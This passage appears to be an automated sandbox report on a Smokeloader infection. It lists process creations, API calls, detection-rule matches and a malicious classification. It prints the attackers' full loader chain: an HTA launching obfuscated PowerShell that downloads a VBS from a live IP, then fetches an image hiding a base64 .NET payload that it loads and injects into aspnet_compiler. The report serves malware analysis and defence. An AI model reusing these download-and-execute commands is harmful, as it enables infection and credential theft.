[dnlib.IO.Home].GetMethod('VAI');$subtractions.Invoke($null, @($restoredText, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00402F5D RtlCreateUserThread,NtTerminateProcess,13_2_00402F5D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_004014BF NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,13_2_004014BF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00402321 NtQuerySystemInformation,NtQueryInformationProcess,13_2_00402321
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_004025D3 NtClose,13_2_004025D3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_004014D6 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,13_2_004014D6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_004022D8 NtQuerySystemInformation,NtQueryInformationProcess,13_2_004022D8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_004022D9 NtQuerySystemInformation,NtQueryInformationProcess,13_2_004022D9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_004022E5 NtQuerySystemInformation,NtQueryInformationProcess,13_2_004022E5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_004014E8 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,13_2_004014E8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_004014EB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,13_2_004014EB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_004022F7 NtQuerySystemInformation,NtQueryInformationProcess,13_2_004022F7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00402686 NtClose,13_2_00402686
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_004030BF RtlCreateUserThread,NtTerminateProcess,13_2_004030BF
                Source: C:\Windows\explorer.exeCode function: 14_2_01212FAC NtQueryInformationProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,14_2_01212FAC
                Source: C:\Windows\explorer.exeCode function: 14_2_01214760 NtCreateSection,14_2_01214760
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_02794B92 RtlMoveMemory,NtUnmapViewOfSection,17_2_02794B92
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_027933C3 NtQueryInformationFile,17_2_027933C3
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_0279342B NtQueryObject,NtQueryObject,RtlMoveMemory,17_2_0279342B
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_0279349B CreateFileW,OpenProcess,NtQueryInformationProcess,NtQueryInformationProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,lstrcmpiW,NtQueryObject,StrRChrW,StrRChrW,lstrcmpiW,GetFileSize,SetFilePointer,SetFilePointer,ReadFile,SetFilePointer,CloseHandle,CloseHandle,CloseHandle,17_2_0279349B
                Source: C:\Windows\explorer.exeCode function: 18_2_001938B0 NtUnmapViewOfSection,18_2_001938B0
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_02F51016 RtlMoveMemory,NtUnmapViewOfSection,19_2_02F51016
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_02CA3D8D RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,20_2_02CA3D8D
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_02CA1F4E NtCreateSection,NtMapViewOfSection,20_2_02CA1F4E
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_02CA1FE5 lstrcmpiA,OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,20_2_02CA1FE5
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 20_2_02CA2E1B OpenProcess,lstrcmpiA,NtQueryInformationProcess,NtQueryInformationProcess,StrStrIW,20_2_02CA2E1B
                Source: C:\Windows\explorer.exeCode function: 21_2_005D5300 NtUnmapViewOfSection,21_2_005D5300
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_02791016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,22_2_02791016
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_02791819 lstrcmpiA,OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,22_2_02791819
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 22_2_02791A80 NtCreateSection,NtMapViewOfSection,22_2_02791A80
                Source: C:\Windows\explorer.exeCode function: 26_2_005D355C NtUnmapViewOfSection,26_2_005D355C
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 27_2_02791016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,27_2_02791016
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 27_2_027918BF OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,27_2_027918BF
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 27_2_02791B26 NtCreateSection,NtMapViewOfSection,27_2_02791B26
                Source: C:\Windows\explorer.exeCode function: 28_2_0014370C NtUnmapViewOfSection,28_2_0014370C
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_04207C488_2_04207C48
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0420BA808_2_0420BA80
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_0420A7688_2_0420A768
                Source: C:\Windows\explorer.exeCode function: 14_2_0121284014_2_01212840
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_0279219817_2_02792198
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_0279C2F917_2_0279C2F9
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_027AB35C17_2_027AB35C
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_027E443817_2_027E4438
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_027AB97E17_2_027AB97E
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_02796E6A17_2_02796E6A
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_027B5F0817_2_027B5F08
                Source: C:\Windows\explorer.exeCode function: 18_2_00191E2018_2_00191E20
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 19_2_02F5170B19_2_02F5170B
                Source: C:\Windows\explorer.exeCode function: 21_2_005D2C0021_2_005D2C00
                Source: C:\Windows\explorer.exeCode function: 26_2_005D205426_2_005D2054
                Source: C:\Windows\explorer.exeCode function: 26_2_005D286026_2_005D2860
                Source: C:\Windows\explorer.exeCode function: 28_2_00142A0428_2_00142A04
                Source: C:\Windows\explorer.exeCode function: 28_2_001420F428_2_001420F4
                Source: C:\Windows\SysWOW64\explorer.exeCode function: String function: 02798801 appears 38 times
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7912 -s 420
                Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                Source: 0000000D.00000002.2020789963.00000000009D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 0000000E.00000002.2893429951.0000000001211000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 0000000D.00000002.2020378566.00000000009A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: Process Memory Space: powershell.exe PID: 7948, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: powershell.exe, 00000004.00000002.1766099409.0000000007271000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .sLnW
                Source: powershell.exe, 00000004.00000002.1766099409.0000000007271000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .slnW
                Source: classification engineClassification label: mal100.phis.bank.troj.spyw.expl.evad.winHTA@41/33@2/2
                Source: C:\Windows\explorer.exeCode function: 14_2_01213BF4 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,SleepEx,14_2_01213BF4
                Source: C:\Windows\explorer.exeCode function: 14_2_012135E8 CoCreateInstance,14_2_012135E8
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\sweetnessgoodforgreatnessthingswithgood[1].tiffJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7956:120:WilError_03
                Source: C:\Users\user\AppData\Roaming\icgfugfMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8112:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7528:120:WilError_03
                Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7912
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7496:120:WilError_03
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rduhv53q.imh.ps1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetnessgoodforgreatnessthingswith.vbS"
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exeJump to behavior
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exeJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: F5AB.tmp.17.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: begoodforeverythinggreatthingsformebetterforgood.htaVirustotal: Detection: 10%
                Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\begoodforeverythinggreatthingsformebetterforgood.hta"
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c powERshEll -EX bYPAss -noP -W 1 -C DevIcEcredeNtIaldEPlOymEnt ; inVOKe-eXPRESSIOn($(invOke-expREsSiOn('[sYSTEm.TExT.ENcODINg]'+[CHAr]0x3a+[char]58+'UtF8.geTsTRinG([systeM.CoNVErT]'+[cHaR]58+[chAR]58+'FROMBaSe64STring('+[ChAr]0x22+'JFNhdVU2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlUkRFRmluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVxeEF1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnSFdna21OLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtdFpJWXFYSUJoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAganRSbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOc0RIanhBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNhdVU2OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjcuMTQ0LzI1MC9zd2VldG5lc3Nnb29kZm9yZ3JlYXRuZXNzdGhpbmdzd2l0aGdvb2QudElGIiwiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyIsMCwwKTtTVGFyVC1TTGVlUCgzKTtpTnZvS0UtZXhwcmVzU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyI='+[cHaR]34+'))')))"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powERshEll -EX bYPAss -noP -W 1 -C DevIcEcredeNtIaldEPlOymEnt ; inVOKe-eXPRESSIOn($(invOke-expREsSiOn('[sYSTEm.TExT.ENcODINg]'+[CHAr]0x3a+[char]58+'UtF8.geTsTRinG([systeM.CoNVErT]'+[cHaR]58+[chAR]58+'FROMBaSe64STring('+[ChAr]0x22+'JFNhdVU2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlUkRFRmluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVxeEF1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnSFdna21OLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtdFpJWXFYSUJoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAganRSbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOc0RIanhBICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFNhdVU2OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjcuMTQ0LzI1MC9zd2VldG5lc3Nnb29kZm9yZ3JlYXRuZXNzdGhpbmdzd2l0aGdvb2QudElGIiwiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyIsMCwwKTtTVGFyVC1TTGVlUCgzKTtpTnZvS0UtZXhwcmVzU2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHN3ZWV0bmVzc2dvb2Rmb3JncmVhdG5lc3N0aGluZ3N3aXRoLnZiUyI='+[cHaR]34+'))')))"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\thj2bm0i\thj2bm0i.cmdline"
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2316.tmp" "c:\Users\user\AppData\Local\Temp\thj2bm0i\CSCE4BAB64F6B1C4E5BA339BD9879E79427.TMP"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\sweetnessgoodforgreatnessthingswith.vbS"
                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.rofdoogemneve/052/441.72.3.291//:p##h';$restoredText = $originalText -replace '#', 't';$vicegerents = 'https://res.cloudinary.com/dnkr4s5yg/image/upload/v1735420882/givvuo2katk3jnggipgn.jpg ';$unroyalist = New-Object System.Net.WebClient;$googleability = $unroyalist.DownloadData($vicegerents);$tuillette = [System.Text.Encoding]::UTF8.GetString($googleability);$marischal = '<<BASE64_START>>';$botchedly = '<<BASE64_END>>';$uscher = $tuillette.IndexOf($marischal);$diffamed = $tuillette.IndexOf($botchedly);$uscher -ge 0 -and $diffamed -gt $uscher;$uscher += $marischal.Length;$tetri = $diffamed - $uscher;$engagement = $tuillette.Substring($uscher, $tetri);$admixture = -join ($engagement.ToCharArray() | ForEach-Object { $_ })[-1..-($engagement.Length)];$satisfy = [System.Convert]::FromBase64String($admixture);$rivets = [System.Reflection.Assembly]::Load($satisfy);$subtractions = [dnlib.IO.Home].GetMethod('VAI');$subtractions.Invoke($null, @($restoredText, 'chlorinations', 'chlorinations', 'chlorinations', 'aspnet_compiler', 'chlorinations', 'chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','chlorinations','1','chlorinations','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\icgfugf C:\Users\user\AppData\Roaming\icgfugf
                Source: C:\Users\user\AppData\Roaming\icgfugfProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7912 -s 420
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\icgfugf C:\Users\user\AppData\Roaming\icgfugf
                Source: C:\Users\user\AppData\Roaming\icgfugfProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c powERshEll -EX bYPAss -noP -W 1 -C DevIcEcredeNtIaldEPlOymEnt ; inVOKe-eXPRESSIOn($(invOke-expREsSiOn('[sYSTEm.TExT.ENcODINg]'+[CHAr]0x3a+[char]58+'UtF8.geTsTRinG([systeM.CoNVErT]'+[cHaR]58+[chAR]58+'FROMBaSe64STring('+[ChAr]0x22+'JFNhdVU2ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWRELXR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTUJlUkRFRmluaXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1PTi5kTGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVxeEF1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBnSFdna21OLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtdFpJWXFYSUJoLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAganRSbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOc0RIanhB